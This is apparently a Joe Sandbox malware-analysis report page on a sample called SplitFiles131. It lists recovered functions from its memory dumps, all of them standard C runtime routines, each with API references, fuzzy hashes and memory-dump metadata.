Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 96f50b6fd2803bd5c4bda2139404532c31f5521687e24c4fa50f21b7b3d75918
Instruction ID: b796e144102367d81c75d730982b4c61d5d1dbfd69c6644539770f527747fe0f
Opcode Fuzzy Hash: 96f50b6fd2803bd5c4bda2139404532c31f5521687e24c4fa50f21b7b3d75918
Instruction Fuzzy Hash: 39F09632404200B7EA60DF76F985C5773F9AA04B14B94880BF044D7A64CB78FCC0965C

Uniqueness

Uniqueness Score: -1.00%

Function 1000BA9B Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 1000BAB3

Part of subcall function 10008701: RtlFreeHeap.NTDLL(00000000,00000000,?,100074AC), ref: 10008717
Part of subcall function 10008701: GetLastError.KERNEL32(?,?,100074AC), ref: 10008729

_free.LIBCMT ref: 1000BAC5
_free.LIBCMT ref: 1000BAD7
_free.LIBCMT ref: 1000BAE9
_free.LIBCMT ref: 1000BAFB

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5fb86163ccc0cf36f5f605bb33fc0d434e280abf0fbc2f313962ea386a657b11
Instruction ID: 322c929f8fa3144f5d3f5fbca3afb4a8048b16d2c69f3c46f8cc95a9a1cb27b8
Opcode Fuzzy Hash: 5fb86163ccc0cf36f5f605bb33fc0d434e280abf0fbc2f313962ea386a657b11
Instruction Fuzzy Hash: 30F0F431618A209BEA54DF68E8C2C1A73E9FB057E07B08809F49CD754DCB32FC808B60

Uniqueness

Uniqueness Score: -1.00%

Function 004416CB Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00441865

Strings

*?, xrefs: 0044170E

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 76b620e72b1dbb4dfcec853c55e4519de0bd11c3334c3aa31fb4d74e4a998a5d
Instruction ID: 94cf888e9de60d1963efd33ec482e46fa66187b9afba07f34032ac2584db377d
Opcode Fuzzy Hash: 76b620e72b1dbb4dfcec853c55e4519de0bd11c3334c3aa31fb4d74e4a998a5d
Instruction Fuzzy Hash: 1F613075E002199FEF14DFA9C8815EEFBF5EF48314B24816AE815F7310E6359E818B94

Uniqueness

Uniqueness Score: -1.00%

Function 100093AE Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 10009548

Strings

*?, xrefs: 100093F1

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 72a3e4ca702a8c4f9c99998b4a73be40bf4d94a3e87db8c17ad137306030f0af
Instruction ID: 0340fc811119e07594000e71e8d06bdc8eabf6b4f8489cd8c2a7edce7445303f
Opcode Fuzzy Hash: 72a3e4ca702a8c4f9c99998b4a73be40bf4d94a3e87db8c17ad137306030f0af
Instruction Fuzzy Hash: E0617EB5E0021A9FEB14CFA9C8819DDFBF5FF48390B25816AE815F7344D631AE418B90

Uniqueness

Uniqueness Score: -1.00%

Function 00421875 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 99COMMONLIBRARYCODE

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 004218E8
GetStringTypeW.KERNEL32(?,00000000,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,0000FDE9), ref: 00421945
__freea.LIBCMT ref: 0042194E

Part of subcall function 0041ED2F: RtlAllocateHeap.NTDLL(00000000,?,?,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041ED61

Strings

tIB, xrefs: 00421888

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: AllocateHeapStringType__alloca_probe_16__freea
String ID: tIB
API String ID: 2035984020-366005614
Opcode ID: eda957cfb15ef7941afacb619c8722be3406a97b873fedbfb145e6bb9f7ac986
Instruction ID: e53cbf2fbd7e5de764d6e10ddde7606d24dd4c66cd89eb36cbd394391ca5fa72
Opcode Fuzzy Hash: eda957cfb15ef7941afacb619c8722be3406a97b873fedbfb145e6bb9f7ac986
Instruction Fuzzy Hash: A831D2B1A0022AABDB209F66DC41DEF7BB5EF54314F45416AFC04A7261D738C991CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004012E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 0040EF48: EnterCriticalSection.KERNEL32(004504FC,00450D8D,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF53
Part of subcall function 0040EF48: LeaveCriticalSection.KERNEL32(004504FC,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EF90

__Init_thread_footer.LIBCMT ref: 00401363

Part of subcall function 0040EEFE: EnterCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF08
Part of subcall function 0040EEFE: LeaveCriticalSection.KERNEL32(004504FC,?,?,0040643C,00450F60,?,?,00450F64,00450F65), ref: 0040EF3B
Part of subcall function 0040EEFE: RtlWakeAllConditionVariable.NTDLL ref: 0040EFB2

Strings

L\O\, xrefs: 004012F6
^., xrefs: 00401304
W, xrefs: 004012FD

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
String ID: L\O\$W$^.
API String ID: 2296764815-2954420958
Opcode ID: 466d19772e7674810153093e6f61bbe3c851cf9c15c590cddcd6ca1366938e27
Instruction ID: ee1b09ab654b966cb7d5fff89a1237d5bce974de8ca2d720cb455b5a0ca2e737
Opcode Fuzzy Hash: 466d19772e7674810153093e6f61bbe3c851cf9c15c590cddcd6ca1366938e27
Instruction Fuzzy Hash: 8321243890074486E710AFB4EC4776D7370BF45309F24867AD8492A6F3E7B9A588CB4C

Uniqueness

Uniqueness Score: -1.00%

Function 00411EBB Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00411F82
___AdjustPointer.LIBCMT ref: 00411FA5
___AdjustPointer.LIBCMT ref: 00412041

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 0ca896192a9c401899d42e9f7ec41fae97fe56b9a9dc6cb600518f1b51295347
Instruction ID: 6bd07d1b73092418ee2073320d9761de18afaf30efd0c82ef62646a350b6d03e
Opcode Fuzzy Hash: 0ca896192a9c401899d42e9f7ec41fae97fe56b9a9dc6cb600518f1b51295347
Instruction Fuzzy Hash: 63510172605206AFDB289F51D881BFA77A4FF04304F14012FEA05976A1D779ECC2CB98

Uniqueness

Uniqueness Score: -1.00%

Function 100049CA Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 10004A91
___AdjustPointer.LIBCMT ref: 10004AB4
___AdjustPointer.LIBCMT ref: 10004B50

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: d7e06759a182467ecbddfc5be9e71537fdf669dd7d98f9716886f151031a7616
Instruction ID: c86ceda4d1325f0568557c1dae7b0478574bf977d686f1191d636807e4b9891e
Opcode Fuzzy Hash: d7e06759a182467ecbddfc5be9e71537fdf669dd7d98f9716886f151031a7616
Instruction Fuzzy Hash: 5D5103B6A04606AFFB18CF50C841B6A77A4EF403D1F12412DED0687199EF32EC40C799

Uniqueness

Uniqueness Score: -1.00%

Function 0042B33E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0042B40E
_free.LIBCMT ref: 0042B437
SetEndOfFile.KERNEL32(00000000,0042860C,00000000,0041E0F8,?,?,?,?,?,?,?,0042860C,0041E0F8,00000000), ref: 0042B469
GetLastError.KERNEL32(?,?,?,?,?,?,?,0042860C,0041E0F8,00000000,?,?,?,?,00000000), ref: 0042B485

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: de3f6e69295ed1edb17ce482ba4b705cbafdd08ef7baa43635d14e82ea768746
Instruction ID: 617302695e0eac8ad5dd037765c23ffc959c8119500e3a216ad439764ca44a70
Opcode Fuzzy Hash: de3f6e69295ed1edb17ce482ba4b705cbafdd08ef7baa43635d14e82ea768746
Instruction Fuzzy Hash: 59411C72B00625ABDB11AFAA9C82B9E3779EF44324F54011BF814D7292D77CC98147AD

Uniqueness

Uniqueness Score: -1.00%

Function 00423B6F Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00419D78: _free.LIBCMT ref: 00419D86

Part of subcall function 00420094: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,004213AE,?,00000000,00000000), ref: 00420140

GetLastError.KERNEL32 ref: 00423BD7
__dosmaperr.LIBCMT ref: 00423BDE
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00423C1D
__dosmaperr.LIBCMT ref: 00423C24

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: acb329c430d9d65b703508cc3e81db56fa1fb9c9c168a09e4ae2cbd405f6ca47
Instruction ID: faa5b2d0112470651306ec9e949e2660e7ba13f531a9181b1b827704a780be5a
Opcode Fuzzy Hash: acb329c430d9d65b703508cc3e81db56fa1fb9c9c168a09e4ae2cbd405f6ca47
Instruction Fuzzy Hash: 8021F472300229AFDB205F67AC81D6BBBBDEF00369790851EF91597241D73CEE418798

Uniqueness

Uniqueness Score: -1.00%

Function 100092C2 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 100098E4: _free.LIBCMT ref: 100098F2

Part of subcall function 1000A4B8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,1000D2A0,?,00000000,00000000), ref: 1000A564

GetLastError.KERNEL32 ref: 1000932A
__dosmaperr.LIBCMT ref: 10009331
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10009370
__dosmaperr.LIBCMT ref: 10009377

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 6740b73893a9458362bcae6edf410e802fc9121dd722963b93f7f203b79a7553
Instruction ID: 0ddff17f411571237369bc97fdb35948c87631787bb5b9b786b2356b208bbcd2
Opcode Fuzzy Hash: 6740b73893a9458362bcae6edf410e802fc9121dd722963b93f7f203b79a7553
Instruction Fuzzy Hash: 6B21B07560021AAFFB10DF618C81D1BB7ADEF442E47118618F968972D5EB70ED509BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041CB63 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00413661,?,00000000,00405D9E,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000), ref: 0041CB68
_free.LIBCMT ref: 0041CBC5
_free.LIBCMT ref: 0041CBFB
SetLastError.KERNEL32(00000000,00000007,000000FF,?,00418194,?,00000000,76686490,?,0041828D,00405D9E,00000000,?,00405D9E,?), ref: 0041CC06

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3abb266c486aac477022de17da07e4251c7c1e35108d8638f05dcf1e3eb67359
Instruction ID: 91b981631096f111d83687cb3943ae5f68f73b373ba64f4aa9f78fd4ccd23e5c
Opcode Fuzzy Hash: 3abb266c486aac477022de17da07e4251c7c1e35108d8638f05dcf1e3eb67359
Instruction Fuzzy Hash: 2411CA766881006BDB1526776CC6EEB21599BC0778B24023BF528D32D1EE6D8CC2516D

Uniqueness

Uniqueness Score: -1.00%

Function 10007BAC Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,100064BF,?,10002482,00000000), ref: 10007BB1
_free.LIBCMT ref: 10007C0E
_free.LIBCMT ref: 10007C44
SetLastError.KERNEL32(00000000,0000000A,000000FF,?,100064BF,?,10002482,00000000), ref: 10007C4F

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: c9421031c8270037eee8d98a36a9266b2192190dd1963cf3c890ea5dd8583a89
Instruction ID: 40064ac180ed46dbc898ff0431a2854e633d7821ece77d32e9ad52d9302bdc28
Opcode Fuzzy Hash: c9421031c8270037eee8d98a36a9266b2192190dd1963cf3c890ea5dd8583a89
Instruction Fuzzy Hash: 2E11E976A04615BAF212D7784CC1E1B3699FBC02F4B324528F55C821EDEF75ED414320

Uniqueness

Uniqueness Score: -1.00%

Function 0041CCBA Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,004135F6,0041ED72,?,?,0040FF9B,?,?,?,?,?,00403757,?,?), ref: 0041CCBF
_free.LIBCMT ref: 0041CD1C
_free.LIBCMT ref: 0041CD52
SetLastError.KERNEL32(00000000,00000007,000000FF,?,0040FF9B,?,?,?,?,?,00403757,?,?,?), ref: 0041CD5D

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: e8b5fd6ac6bcdbc63dd879f339bbd85be9c8e0b1b4a1cafcd1e0970895d8910c
Instruction ID: 9b62fba310747dd0c1bf6bb4efed2382b058d2b05c29c2c7201b5ba533af619d
Opcode Fuzzy Hash: e8b5fd6ac6bcdbc63dd879f339bbd85be9c8e0b1b4a1cafcd1e0970895d8910c
Instruction Fuzzy Hash: C011AC367442006BDB11277B6CC5DE72659ABC1779724023BF92C931D1ED6D8CC2456D

Uniqueness

Uniqueness Score: -1.00%

Function 10007D03 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,1000640B,10008727,?,?,100074AC), ref: 10007D08
_free.LIBCMT ref: 10007D65
_free.LIBCMT ref: 10007D9B
SetLastError.KERNEL32(00000000,0000000A,000000FF,?,?,1000640B,10008727,?,?,100074AC), ref: 10007DA6

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: a1b51e29a2483d9d067290d82e8b33bd0401e2047f5f7481da3912e5413e3180
Instruction ID: 68182e47bee727d8c9ea21c39a6ce122361ce54ca7b3a3919661bbd41b246de3
Opcode Fuzzy Hash: a1b51e29a2483d9d067290d82e8b33bd0401e2047f5f7481da3912e5413e3180
Instruction Fuzzy Hash: 38110476B04615BAF212D7788CC1D2B26BAFFC02F0B314226F56C821EEDE75ED514221

Uniqueness

Uniqueness Score: -1.00%

Function 0043F031 Relevance: 6.1, APIs: 4, Instructions: 60COMMON

Download Yara Rule

APIs

___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043F04D
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043F066

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: Value___vcrt_
String ID:
API String ID: 1426506684-0
Opcode ID: bbd0fb90c6f543932e03e6b2f5c9411f0a441a56121ea3fd60b0444541a7708f
Instruction ID: 2f914ca0b150f54681f4df5d10c51623e56e86357141abab0502ee71ee4cbc58
Opcode Fuzzy Hash: bbd0fb90c6f543932e03e6b2f5c9411f0a441a56121ea3fd60b0444541a7708f
Instruction Fuzzy Hash: 80012D33D083119DA62967BDBC855AB2B65DB1C378F20133FF620902F2EF594C19914C

Uniqueness

Uniqueness Score: -1.00%

Function 0042B7F2 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,00000000,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000), ref: 0042B809
GetLastError.KERNEL32(?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?,00000000,?,004210DE,?), ref: 0042B815

Part of subcall function 0042B7DB: CloseHandle.KERNEL32(FFFFFFFE,0042B825,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?,00000000), ref: 0042B7EB

___initconout.LIBCMT ref: 0042B825

Part of subcall function 0042B79D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0042B7CC,0042A4E3,00000000,?,00420B92,?,00000000,00000000,?), ref: 0042B7B0

WriteConsoleW.KERNEL32(00000000,0000000C,00000000,00000000,?,0042A4F6,00000000,00000001,00000000,00000000,?,00420B92,?,00000000,00000000,?), ref: 0042B83A

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 3771de78c200026101a5c29d47a2f31da0f5e9a11cf076d30a3b181c11986b3a
Instruction ID: ac75466029322dda25ac2c1e9c6ff5057a4b7c88608daf2fa63318e0ae8d8abe
Opcode Fuzzy Hash: 3771de78c200026101a5c29d47a2f31da0f5e9a11cf076d30a3b181c11986b3a
Instruction Fuzzy Hash: 98F03736600129BBCF222FD2EC05D9A3F26FB443B0B444025F90D96531C73288709BD9

Uniqueness

Uniqueness Score: -1.00%

Function 1000E591 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001), ref: 1000E5A8
GetLastError.KERNEL32(?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?,00000001,?,1000C9F7,10008E0A), ref: 1000E5B4

Part of subcall function 1000E57A: CloseHandle.KERNEL32(FFFFFFFE,1000E5C4,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?,00000001), ref: 1000E58A

___initconout.LIBCMT ref: 1000E5C4

Part of subcall function 1000E53C: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000E56B,1000D975,00000001,?,1000C4AB,?,?,00000001,?), ref: 1000E54F

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000D988,?,00000001,?,00000001,?,1000C4AB,?,?,00000001,?), ref: 1000E5D9

Memory Dump Source

Source File: 00000005.00000002.373201641.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000005.00000002.373194501.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373235686.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373290504.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.373298768.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_10000000_SplitFiles131.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: db033fb1b874636e85d330483b63d37f63c04bcfd1e8b3716c06f70c47e2a96d
Instruction ID: b377c5219626dc8a0c0ad289bd514fd869925b16e60f045967f437c28a647ed1
Opcode Fuzzy Hash: db033fb1b874636e85d330483b63d37f63c04bcfd1e8b3716c06f70c47e2a96d
Instruction Fuzzy Hash: F4F03036540569BBEF12AFA1CC49A8A3F66FB083E1F018410FE48A5131DA32CD20DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0040EFD1 Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

SleepConditionVariableCS.KERNELBASE(?,0040EF6D,00000064), ref: 0040EFF4
LeaveCriticalSection.KERNEL32(004504FC,004063FC,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040EFFE
WaitForSingleObjectEx.KERNEL32(004063FC,00000000,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040F00F
EnterCriticalSection.KERNEL32(004504FC,?,0040EF6D,00000064,?,?,004063FC,00450F60,00450F64,00450F65), ref: 0040F016

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
String ID:
API String ID: 3269011525-0
Opcode ID: f64a1fe2d3c08a56fcd9346185c77cb8d93b1cbc53ddc582fa2c2fd8cd520f41
Instruction ID: 4c9c1218df18ba92a0a868e9c99513ef249696396432c8a4148075b9a22993ac
Opcode Fuzzy Hash: f64a1fe2d3c08a56fcd9346185c77cb8d93b1cbc53ddc582fa2c2fd8cd520f41
Instruction Fuzzy Hash: 0AE09235681225FBCA212B51EC08A9E7F18AF06752B004032FE0566262CB7568119BDD

Uniqueness

Uniqueness Score: -1.00%

Function 0041AC67 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 0041AC70

Part of subcall function 0041E2B8: HeapFree.KERNEL32(00000000,00000000,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?), ref: 0041E2CE
Part of subcall function 0041E2B8: GetLastError.KERNEL32(?,?,00425D87,?,00000000,?,?,?,0042602A,?,00000007,?,?,0042651D,?,?), ref: 0041E2E0

_free.LIBCMT ref: 0041AC83
_free.LIBCMT ref: 0041AC94
_free.LIBCMT ref: 0041ACA5

Memory Dump Source

Source File: 00000005.00000002.371399176.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.371511800.0000000000452000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_SplitFiles131.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7600757227941bb7c95799b95531e21e679b1f58566f426ab12c79b805c51534
Instruction ID: 302bd469a5a2dc94dd6d614bbecc9892323fc590e190cb025f464d2d07f9e9ff
Opcode Fuzzy Hash: 7600757227941bb7c95799b95531e21e679b1f58566f426ab12c79b805c51534
